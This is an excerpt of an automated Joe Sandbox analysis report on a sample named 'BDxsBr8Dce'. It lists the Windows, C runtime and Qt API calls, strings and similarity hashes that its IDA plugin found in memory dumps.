                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_0_2_770000_BDxsBr8Dce.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: Thread$CloseCreateCurrentHandle$Event
                                                                                                            • String ID:
                                                                                                            • API String ID: 1660231879-0
                                                                                                            • Opcode ID: b1819eab727879c2bf6f536a51b3d2a13f412a43362820eeb2ecd66607a4786d
                                                                                                            • Instruction ID: 6141d08cb9f64059bd174648f6a219a72f861899c14198be8f9ddeb4d83ba471
                                                                                                            • Opcode Fuzzy Hash: b1819eab727879c2bf6f536a51b3d2a13f412a43362820eeb2ecd66607a4786d
                                                                                                            • Instruction Fuzzy Hash: 5F2138B0684744EFE774DF21DC89B293BA1FB04B11F50452CF1219E1D4CBB99884EB12
                                                                                                            APIs
                                                                                                              • Part of subcall function 01089420: GetFileAttributesW.KERNEL32(00000000), ref: 010894D8
                                                                                                              • Part of subcall function 01089420: GetLastError.KERNEL32(?,?,?,?,?), ref: 0108951C
                                                                                                            • SetErrorMode.KERNEL32(00008001,00000006,?,00000004,.lnk,00000001), ref: 01088361
                                                                                                            • GetFileAttributesExW.KERNEL32(00000000,00000000,?), ref: 01088393
                                                                                                            • SetErrorMode.KERNEL32(00000000,?,?,?,?,?,?), ref: 010883FC
                                                                                                              • Part of subcall function 01089B30: CoCreateInstance.OLE32 ref: 01089BB9
                                                                                                              • Part of subcall function 01089B30: CoInitialize.OLE32(00000000), ref: 01089BC6
                                                                                                              • Part of subcall function 01089B30: CoCreateInstance.OLE32(01514B24,00000000,00000001,01514A94,?), ref: 01089BDF
                                                                                                            • SetErrorMode.KERNEL32(00000000,?,?,?,?,?,?,?,?), ref: 01088569
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.3235543481.0000000000771000.00000020.00000001.01000000.00000003.sdmp, Offset: 00770000, based on PE: true
                                                                                                            • Associated: 00000000.00000002.3235479456.0000000000770000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.3236201681.0000000001165000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.3236201681.0000000001336000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.3236201681.00000000013A1000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.3236201681.00000000014A7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.3236525954.00000000015A2000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.3236544491.00000000015AB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.3236562405.00000000015AE000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.3236582000.00000000015BD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.3236582000.00000000015CE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.3236582000.00000000015D5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.3236582000.00000000015D9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.3236657461.00000000015DB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.3236657461.00000000015DD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_0_2_770000_BDxsBr8Dce.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: Error$Mode$AttributesCreateFileInstance$InitializeLast
                                                                                                            • String ID: .lnk
                                                                                                            • API String ID: 3954637025-24824748
                                                                                                            • Opcode ID: c0cfde25cdbd14388dc7689560468e65c6ad36bb9a903a3840f93981b359cdeb
                                                                                                            • Instruction ID: d61879fcb5ec37031f01f628ccd94da6ebb403467c4543e3b091f6faf6d88c07
                                                                                                            • Opcode Fuzzy Hash: c0cfde25cdbd14388dc7689560468e65c6ad36bb9a903a3840f93981b359cdeb
                                                                                                            • Instruction Fuzzy Hash: 3DC1F4716083419FD764EF28C845BABB7E4BF99314F44491EF5CA97281EB34E908CB62
                                                                                                            APIs
                                                                                                            • ?isUnicodeEscapeSequence@Lexer@QQmlJS@@CA_NPBVQChar@@@Z.BDXSBR8DCE(?), ref: 00C220E4
                                                                                                              • Part of subcall function 00C22430: ?isHexDigit@Lexer@QQmlJS@@CA_NVQChar@@@Z.BDXSBR8DCE(?,00C220E9,?), ref: 00C224B0
                                                                                                            • ?scanChar@Lexer@QQmlJS@@AAEXXZ.BDXSBR8DCE ref: 00C220F2
                                                                                                            • ?scanChar@Lexer@QQmlJS@@AAEXXZ.BDXSBR8DCE ref: 00C22102
                                                                                                            • ?scanChar@Lexer@QQmlJS@@AAEXXZ.BDXSBR8DCE ref: 00C22112
                                                                                                            • ?scanChar@Lexer@QQmlJS@@AAEXXZ.BDXSBR8DCE ref: 00C22122
                                                                                                            • ?scanChar@Lexer@QQmlJS@@AAEXXZ.BDXSBR8DCE ref: 00C22132
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.3235543481.0000000000771000.00000020.00000001.01000000.00000003.sdmp, Offset: 00770000, based on PE: true
                                                                                                            • Associated: 00000000.00000002.3235479456.0000000000770000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.3236201681.0000000001165000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.3236201681.0000000001336000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.3236201681.00000000013A1000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.3236201681.00000000014A7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.3236525954.00000000015A2000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.3236544491.00000000015AB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.3236562405.00000000015AE000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.3236582000.00000000015BD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.3236582000.00000000015CE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.3236582000.00000000015D5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.3236582000.00000000015D9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.3236657461.00000000015DB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.3236657461.00000000015DD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_0_2_770000_BDxsBr8Dce.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: Lexer@$?scanChar@$Char@@@$Digit@EscapeSequence@Unicode
                                                                                                            • String ID:
                                                                                                            • API String ID: 2534264276-0
                                                                                                            • Opcode ID: 7cd63ac338b79833611ece80666e5df299663ee6aafe016f939ed442b2f4a5e6
                                                                                                            • Instruction ID: 56b518752b9d0838764ac67bb4971efe0959d693735af2298bfd0e2492bb7338
                                                                                                            • Opcode Fuzzy Hash: 7cd63ac338b79833611ece80666e5df299663ee6aafe016f939ed442b2f4a5e6
                                                                                                            • Instruction Fuzzy Hash: A5114C35624330ABCB11BF68990152FB7E1BF94700F40484EF99157B62EB75EC18D796
                                                                                                            APIs
                                                                                                            • ____lc_codepage_func.LIBCMT ref: 01102EC5
                                                                                                            • __calloc_crt.LIBCMT ref: 01102ED6
                                                                                                              • Part of subcall function 011121D2: __calloc_impl.LIBCMT ref: 011121E1
                                                                                                            • ___pctype_func.LIBCMT ref: 01102EE9
                                                                                                            • _memmove.LIBCMT ref: 01102EF2
                                                                                                            • ___pctype_func.LIBCMT ref: 01102F03
                                                                                                            • ____lc_locale_name_func.LIBCMT ref: 01102F0F
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.3235543481.0000000000771000.00000020.00000001.01000000.00000003.sdmp, Offset: 00770000, based on PE: true
                                                                                                            • Associated: 00000000.00000002.3235479456.0000000000770000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.3236201681.0000000001165000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.3236201681.0000000001336000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.3236201681.00000000013A1000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.3236201681.00000000014A7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.3236525954.00000000015A2000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.3236544491.00000000015AB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.3236562405.00000000015AE000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.3236582000.00000000015BD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.3236582000.00000000015CE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.3236582000.00000000015D5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.3236582000.00000000015D9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.3236657461.00000000015DB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.3236657461.00000000015DD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_0_2_770000_BDxsBr8Dce.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: ___pctype_func$____lc_codepage_func____lc_locale_name_func__calloc_crt__calloc_impl_memmove
                                                                                                            • String ID:
                                                                                                            • API String ID: 1321936363-0
                                                                                                            • Opcode ID: d93628a4e13145ed2288166d8f01c008170a04a77d3d6525301e9f5edf95ac0c
                                                                                                            • Instruction ID: d3e5a205c693db634d0e535d31f69136c209fb3a01054ee8e1a7fb8906a7a86d
                                                                                                            • Opcode Fuzzy Hash: d93628a4e13145ed2288166d8f01c008170a04a77d3d6525301e9f5edf95ac0c
                                                                                                            • Instruction Fuzzy Hash: 92F0C271904702AAE719AF74E809B46F7F4AF20765F00C43DE65887580EB74E4408B55
                                                                                                            APIs
                                                                                                            • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00F959E5
                                                                                                            • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00F95A1C
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.3235543481.0000000000771000.00000020.00000001.01000000.00000003.sdmp, Offset: 00770000, based on PE: true
                                                                                                            • Associated: 00000000.00000002.3235479456.0000000000770000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.3236201681.0000000001165000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.3236201681.0000000001336000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.3236201681.00000000013A1000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.3236201681.00000000014A7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.3236525954.00000000015A2000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.3236544491.00000000015AB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.3236562405.00000000015AE000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.3236582000.00000000015BD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.3236582000.00000000015CE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.3236582000.00000000015D5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.3236582000.00000000015D9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.3236657461.00000000015DB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.3236657461.00000000015DD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_0_2_770000_BDxsBr8Dce.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: Unothrow_t@std@@@__ehfuncinfo$??2@
                                                                                                            • String ID: gfff$gfff$gfff
                                                                                                            • API String ID: 885266447-4275324669
                                                                                                            • Opcode ID: 3e341f685ba7ff414aa66710107c86960423daef1478cc9a86917ef1d6e87b59
                                                                                                            • Instruction ID: 04f1b2d19e799ec9c914ba79f9386588ac8d45b6f7053841b5de4a3bee3c999a
                                                                                                            • Opcode Fuzzy Hash: 3e341f685ba7ff414aa66710107c86960423daef1478cc9a86917ef1d6e87b59
                                                                                                            • Instruction Fuzzy Hash: 1D41F3B3B00A220BEF1D8D3D9C6573E658ADBD4700F0A823DAD0ADB7D4E668DD058385
                                                                                                            APIs
                                                                                                              • Part of subcall function 00F888A0: _malloc.LIBCMT ref: 00F888B5
                                                                                                            • _memmove.LIBCMT ref: 00945C63
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.3235543481.0000000000771000.00000020.00000001.01000000.00000003.sdmp, Offset: 00770000, based on PE: true
                                                                                                            • Associated: 00000000.00000002.3235479456.0000000000770000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.3236201681.0000000001165000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.3236201681.0000000001336000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.3236201681.00000000013A1000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.3236201681.00000000014A7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.3236525954.00000000015A2000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.3236544491.00000000015AB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.3236562405.00000000015AE000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.3236582000.00000000015BD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.3236582000.00000000015CE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.3236582000.00000000015D5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.3236582000.00000000015D9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.3236657461.00000000015DB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.3236657461.00000000015DD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_0_2_770000_BDxsBr8Dce.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: _malloc_memmove
                                                                                                            • String ID: 1_q_handleButtonClicked()$1_q_handleButtonDestroyed()$2clicked()$2destroyed()
                                                                                                            • API String ID: 1183979061-3314812979
                                                                                                            • Opcode ID: 352ddf698a53e80258d7e8e6fb82a2b7b51252e4a204179c29af8dded856f2a2
                                                                                                            • Instruction ID: c523708bbaa427c6231b0cbf837c87354df9c9cd7c53926aec85a9eb4d109c65
                                                                                                            • Opcode Fuzzy Hash: 352ddf698a53e80258d7e8e6fb82a2b7b51252e4a204179c29af8dded856f2a2
                                                                                                            • Instruction Fuzzy Hash: 0B31EE316007029BDB14EF58CCD1E6BB3A8AF91305F094669F8859B283EB30ED49CB91
                                                                                                            APIs
                                                                                                            • std::_Lockit::_Lockit.LIBCPMT ref: 00772AEC
                                                                                                              • Part of subcall function 01102D36: __lock.LIBCMT ref: 01102D47
                                                                                                            • std::exception::exception.LIBCMT ref: 00772B4D
                                                                                                              • Part of subcall function 01104058: std::exception::_Copy_str.LIBCMT ref: 01104071
                                                                                                            • __CxxThrowException@8.LIBCMT ref: 00772B64
                                                                                                              • Part of subcall function 011041A5: RaiseException.KERNEL32(?,?,00000001,01579490,?,?,?,?,?,00F70BE2,00000001,01579490), ref: 011041FA
                                                                                                            • std::_Locinfo::_Locinfo_ctor.LIBCPMT ref: 00772B6B
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.3235543481.0000000000771000.00000020.00000001.01000000.00000003.sdmp, Offset: 00770000, based on PE: true
                                                                                                            • Associated: 00000000.00000002.3235479456.0000000000770000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.3236201681.0000000001165000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.3236201681.0000000001336000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.3236201681.00000000013A1000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.3236201681.00000000014A7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.3236525954.00000000015A2000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.3236544491.00000000015AB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.3236562405.00000000015AE000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.3236582000.00000000015BD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.3236582000.00000000015CE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.3236582000.00000000015D5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.3236582000.00000000015D9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.3236657461.00000000015DB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.3236657461.00000000015DD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_0_2_770000_BDxsBr8Dce.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: std::_$Copy_strExceptionException@8Locinfo::_Locinfo_ctorLockitLockit::_RaiseThrow__lockstd::exception::_std::exception::exception
                                                                                                            • String ID: bad locale name
                                                                                                            • API String ID: 271752322-1405518554
                                                                                                            • Opcode ID: 79dd1916b2e82d2550e4680a19b8d8acdba881b6d52bc94f19f752047e4bae73
                                                                                                            • Instruction ID: dad77187bfa49ebdec0d297e873362d2a106690462005fb863f719c62272cbe8
                                                                                                            • Opcode Fuzzy Hash: 79dd1916b2e82d2550e4680a19b8d8acdba881b6d52bc94f19f752047e4bae73
                                                                                                            • Instruction Fuzzy Hash: B32160B1508B809FD325DF28C844B47BBE4BF28618F404E1EE49997B91E775E108CB96
                                                                                                            APIs
                                                                                                            • GetModuleHandleW.KERNEL32(kernel32,?,01016688), ref: 010167A1
                                                                                                            • GetProcAddress.KERNEL32(00000000,GetTickCount64), ref: 010167B1
                                                                                                            • QueryPerformanceFrequency.KERNEL32(00000000,?,01016688), ref: 010167C0
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.3235543481.0000000000771000.00000020.00000001.01000000.00000003.sdmp, Offset: 00770000, based on PE: true
                                                                                                            • Associated: 00000000.00000002.3235479456.0000000000770000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.3236201681.0000000001165000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.3236201681.0000000001336000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.3236201681.00000000013A1000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.3236201681.00000000014A7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.3236525954.00000000015A2000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.3236544491.00000000015AB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.3236562405.00000000015AE000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.3236582000.00000000015BD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.3236582000.00000000015CE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.3236582000.00000000015D5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.3236582000.00000000015D9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.3236657461.00000000015DB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.3236657461.00000000015DD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_0_2_770000_BDxsBr8Dce.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: AddressFrequencyHandleModulePerformanceProcQuery
                                                                                                            • String ID: GetTickCount64$kernel32
                                                                                                            • API String ID: 2336713336-1084265160
                                                                                                            • Opcode ID: 48782e7c331da13b514371fe046f344648c37342bad4543cb5f7283e464355be
                                                                                                            • Instruction ID: cd92411f6e378eb1900d1f464423c41ba28615947f2d3906d6e339b712fff99e
                                                                                                            • Opcode Fuzzy Hash: 48782e7c331da13b514371fe046f344648c37342bad4543cb5f7283e464355be
                                                                                                            • Instruction Fuzzy Hash: 95F096B49093009FD7B29B3AE9447043AE47F18601F45066AE460C6228FBB680CCE753
                                                                                                            APIs
                                                                                                            • ?allocate_helper@MemoryPool@QQmlJS@@AAEPAXI@Z.BDXSBR8DCE(00000028), ref: 00C01BC2
                                                                                                            • ??0UiQualifiedId@AST@QQmlJS@@QAE@ABVQStringRef@@@Z.BDXSBR8DCE(?,?,00000028), ref: 00C01BD2
                                                                                                            • ?allocate_helper@MemoryPool@QQmlJS@@AAEPAXI@Z.BDXSBR8DCE(00000028,?,?,?,00000028), ref: 00C01C22
                                                                                                            • _free.LIBCMT ref: 00C01CBD
                                                                                                            • _free.LIBCMT ref: 00C01CD2
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.3235543481.0000000000771000.00000020.00000001.01000000.00000003.sdmp, Offset: 00770000, based on PE: true
                                                                                                            • Associated: 00000000.00000002.3235479456.0000000000770000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.3236201681.0000000001165000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.3236201681.0000000001336000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.3236201681.00000000013A1000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.3236201681.00000000014A7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.3236525954.00000000015A2000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.3236544491.00000000015AB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.3236562405.00000000015AE000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.3236582000.00000000015BD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.3236582000.00000000015CE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.3236582000.00000000015D5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.3236582000.00000000015D9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.3236657461.00000000015DB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.3236657461.00000000015DD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_0_2_770000_BDxsBr8Dce.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: ?allocate_helper@MemoryPool@_free$QualifiedRef@@@String
                                                                                                            • String ID:
                                                                                                            • API String ID: 406153643-0
                                                                                                            • Opcode ID: 97bc7ff8941ce74258e018045247ce0f08006a0c9804cb91ffffb9d7738fb947
                                                                                                            • Instruction ID: 333df806a7ae1e2256fe58fdca0de78e4a3bf3af19460c91551f2de9f1b53410
                                                                                                            • Opcode Fuzzy Hash: 97bc7ff8941ce74258e018045247ce0f08006a0c9804cb91ffffb9d7738fb947
                                                                                                            • Instruction Fuzzy Hash: 16616EB5A047029FD718CF19C480A26F7F0FF98344F188A6DE8A98B391E771E945CB91
                                                                                                            APIs
                                                                                                            • ?isWarning@DiagnosticMessage@QQmlJS@@QBE_NXZ.BDXSBR8DCE(00000000,00000000,?,?,?,?,?,?,008A67B2,00000000,?,?,00000000), ref: 008A7218
                                                                                                            • GetSystemMetrics.USER32(00000031), ref: 008A7223
                                                                                                            • DestroyCursor.USER32(00000000), ref: 008A7278
                                                                                                              • Part of subcall function 008A7100: _memmove.LIBCMT ref: 008A7133
                                                                                                            • ?isWarning@DiagnosticMessage@QQmlJS@@QBE_NXZ.BDXSBR8DCE(00000000,00000000,?,?,?,?,?,?,008A67B2,00000000,?,?,00000000), ref: 008A7283
                                                                                                            • LoadImageW.USER32(00000000,00007F00,00000001,00000031,00000032,00008000), ref: 008A72AE
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.3235543481.0000000000771000.00000020.00000001.01000000.00000003.sdmp, Offset: 00770000, based on PE: true
                                                                                                            • Associated: 00000000.00000002.3235479456.0000000000770000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.3236201681.0000000001165000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.3236201681.0000000001336000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.3236201681.00000000013A1000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.3236201681.00000000014A7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.3236525954.00000000015A2000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.3236544491.00000000015AB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.3236562405.00000000015AE000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.3236582000.00000000015BD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.3236582000.00000000015CE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.3236582000.00000000015D5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.3236582000.00000000015D9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.3236657461.00000000015DB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.3236657461.00000000015DD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_0_2_770000_BDxsBr8Dce.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: DiagnosticMessage@Warning@$CursorDestroyImageLoadMetricsSystem_memmove
                                                                                                            • String ID:
                                                                                                            • API String ID: 3105249646-0
                                                                                                            • Opcode ID: 3071c8551a61b071424e8481fb4ab26334683bc5f11c19ece5c6532c65e5e024
                                                                                                            • Instruction ID: 6449ac8a57bf600a0b5770680c1da875577413a9f18f2322ff49fdbc5bfac602
                                                                                                            • Opcode Fuzzy Hash: 3071c8551a61b071424e8481fb4ab26334683bc5f11c19ece5c6532c65e5e024
                                                                                                            • Instruction Fuzzy Hash: A5317E71108300ABE728EF64DC85FA73B69FF45744F140068F9068B297EA72E944CBB2
                                                                                                            APIs
                                                                                                            • _malloc.LIBCMT ref: 00F81276
                                                                                                              • Part of subcall function 01106A1E: __FF_MSGBANNER.LIBCMT ref: 01106A35
